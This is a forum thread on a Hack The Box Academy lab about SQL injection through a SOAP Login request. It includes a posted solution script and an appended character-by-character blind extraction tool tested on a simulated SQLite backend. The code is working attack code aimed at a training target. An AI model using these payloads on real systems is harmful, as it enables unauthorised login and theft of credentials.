Web Service & API Attacks - Skills Assessment

If someone who understands this deeply still watches this topic, please DM me. I got the flag, but I don’t understand why it worked.

I used OpenAI and asked: “If I use this sub-select ‘…(SELECT password FROM users WHERE username = ‘admin’ LIMIT 1);’, how do I change it so that it only returns a row where the password begins with ‘FLAG’?”

It provided me a subquery with a wildcard that helped me get the flag.

3 hrs in and I still can’t find it. Last exercise to finish the path; I crafted everything I could, automated, Burp etc… I’m losing my mind, if someone could help me please!

Holy moly I got it. I was completely lost most of this module. I feel like the author did a terrible job explaining things in this one. Most of the modules I do pretty well following along but this one was a nightmare.

Basically, using the automate.py script they have in the earlier section, modifying it for Login requests rather than command execution, and adding a very basic SQLi payload gave me the flag.

I did not care for this module at all and I hope they revisit it and update it to be more clear in the instructions.

Unfortunately, going to HTB Academy to learn something is not the intended way; it’s just not how things work here. It’s common to get stuck on something trivial for hours and waste time on seemingly pointless tasks. But learning the hard way has its benefits too: you have the choice to find a better place or endure the challenges here.

For this challenge, you need to understand the main concept. This is still SQL injection, but it’s within a specific payload. Just as you would typically perform your actions in a browser’s input field, here you do the same thing, but within the specific payload format. So the actual goal here is to learn how to “find” the correct payload …

SPOILER ALERT!

Full solution:

import requests

# SOAP envelope for the Login operation; the SQL injection sits in the
# tem:username element text, so it must be valid XML text as well as SQL.
payload = '''<?xml version="1.0" encoding="UTF-8"?>
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:tem="http://tempuri.org/">
   <soapenv:Header/>
   <soapenv:Body>
      <tem:LoginRequest>
         <tem:username>admin' OR (SELECT password FROM users WHERE username = 'admin' AND password LIKE 'FLAG%')-- </tem:username>
         <tem:password>password</tem:password>
      </tem:LoginRequest>
   </soapenv:Body>
</soapenv:Envelope>'''

# Host and port are the lab target; the SOAPAction header selects the operation.
response = requests.post(
    "http://10.10.10.10:302/wsdl",
    data=payload,
    headers={"SOAPAction": '"Login"'},
    timeout=10,
)
print(response.content)
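The technique behind the solution above, as an added example that is not part of the original thread or of the lab: a SQL injection carried inside the tem:username element of a SOAP Login request, turned into a boolean oracle. Instead of one LIKE 'FLAG%' check it extracts the whole password character by character, escapes the LIKE wildcards % and _ so they cannot match anything but themselves, and then repairs letter case, which LIKE folds on SQLite and on MySQL's default collations. The backend is a constructed SQLite stand-in (VulnerableSoapLogin), the flag value FAKE_FLAG is made up, the element names follow the envelope in the post, and the username 'nobody' is an assumption: it is chosen to not exist, so the login outcome depends only on the injected subquery.

```python
import sqlite3
import string
import xml.etree.ElementTree as ET

SOAP_NS = "http://schemas.xmlsoap.org/soap/envelope/"
TEM_NS = "http://tempuri.org/"
ET.register_namespace("soapenv", SOAP_NS)
ET.register_namespace("tem", TEM_NS)

# Constructed secret for the simulated backend (assumption; not the lab's flag).
# It contains LIKE wildcards and mixed case on purpose, to exercise both edge cases.
FAKE_FLAG = "FLAG{s0ap_sql1_%done}"

# Candidates tried at each position; both letter cases are listed so the loop
# also works against a case-sensitive LIKE.
CHARSET = string.digits + string.ascii_letters + "{}_-!%"


def build_login_envelope(username: str, password: str) -> str:
    """Serialise a tem:LoginRequest envelope. ElementTree escapes <, > and &, so
    quotes, dashes and wildcards in an injection string survive serialisation."""
    env = ET.Element(f"{{{SOAP_NS}}}Envelope")
    ET.SubElement(env, f"{{{SOAP_NS}}}Header")
    body = ET.SubElement(env, f"{{{SOAP_NS}}}Body")
    req = ET.SubElement(body, f"{{{TEM_NS}}}LoginRequest")
    ET.SubElement(req, f"{{{TEM_NS}}}username").text = username
    ET.SubElement(req, f"{{{TEM_NS}}}password").text = password
    return ET.tostring(env, encoding="unicode")


class VulnerableSoapLogin:
    """Constructed stand-in for the lab's Login operation: it parses the envelope
    and pastes the element text straight into SQL, which is the injection point."""

    def __init__(self, admin_password: str):
        self.db = sqlite3.connect(":memory:")
        self.db.execute("CREATE TABLE users (username TEXT, password TEXT)")
        self.db.execute("INSERT INTO users VALUES ('admin', ?)", (admin_password,))

    def handle(self, envelope: str) -> str:
        root = ET.fromstring(envelope)
        username = root.findtext(f".//{{{TEM_NS}}}username") or ""
        password = root.findtext(f".//{{{TEM_NS}}}password") or ""
        query = (f"SELECT username FROM users WHERE username = '{username}' "
                 f"AND password = '{password}'")
        try:
            row = self.db.execute(query).fetchone()
        except sqlite3.Error:
            return "Error"
        return "Login successful" if row else "Invalid credentials"


def like_escape(text: str) -> str:
    """Escape %, _ and the escape character itself for LIKE ... ESCAPE '\\',
    then double single quotes so the text can sit inside the injected literal."""
    out = text.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")
    return out.replace("'", "''")


def admin_row_matches(target: VulnerableSoapLogin, condition: str) -> bool:
    """Boolean oracle: 'nobody' makes the original comparison false, so the login
    succeeds only when `condition` holds for the admin row."""
    injected = ("nobody' OR EXISTS(SELECT 1 FROM users WHERE username = 'admin' "
                f"AND {condition})-- ")
    return target.handle(build_login_envelope(injected, "x")) == "Login successful"


def starts_with(target: VulnerableSoapLogin, prefix: str) -> bool:
    """The post's LIKE 'FLAG%' check, generalised to any prefix."""
    return admin_row_matches(target, f"password LIKE '{like_escape(prefix)}%' ESCAPE '\\'")


def char_at_is(target: VulnerableSoapLogin, pos: int, ch: str) -> bool:
    """Code-point-exact check on one character; unicode()/substr() are SQLite
    names, MySQL would use ORD(SUBSTRING(...))."""
    return admin_row_matches(target, f"unicode(substr(password, {pos}, 1)) = {ord(ch)}")


def extract_password(target: VulnerableSoapLogin, max_len: int = 64) -> str:
    """Grow the prefix one character at a time with the LIKE oracle, then fix
    letter case, which LIKE folds on SQLite and MySQL defaults."""
    known = ""
    while len(known) < max_len:
        for c in CHARSET:
            if starts_with(target, known + c):
                known += c
                break
        else:
            break  # nothing extends the prefix: end of string or char outside CHARSET
    exact = ""
    for pos, c in enumerate(known, start=1):
        if c.isalpha() and not char_at_is(target, pos, c):
            c = c.swapcase()
        exact += c
    return exact


if __name__ == "__main__":
    print(extract_password(VulnerableSoapLogin(FAKE_FLAG)))
```

Against the real lab, `handle` would be replaced by a `requests.post` of the same envelope with the SOAPAction header, and the success string by whatever the service returns for a valid login. Two checks worth keeping when adapting it: confirm the oracle with a known-true and a known-false condition before extracting, and keep the ESCAPE clause, because an unescaped `_` or `%` in a guessed prefix matches any character and silently corrupts the result.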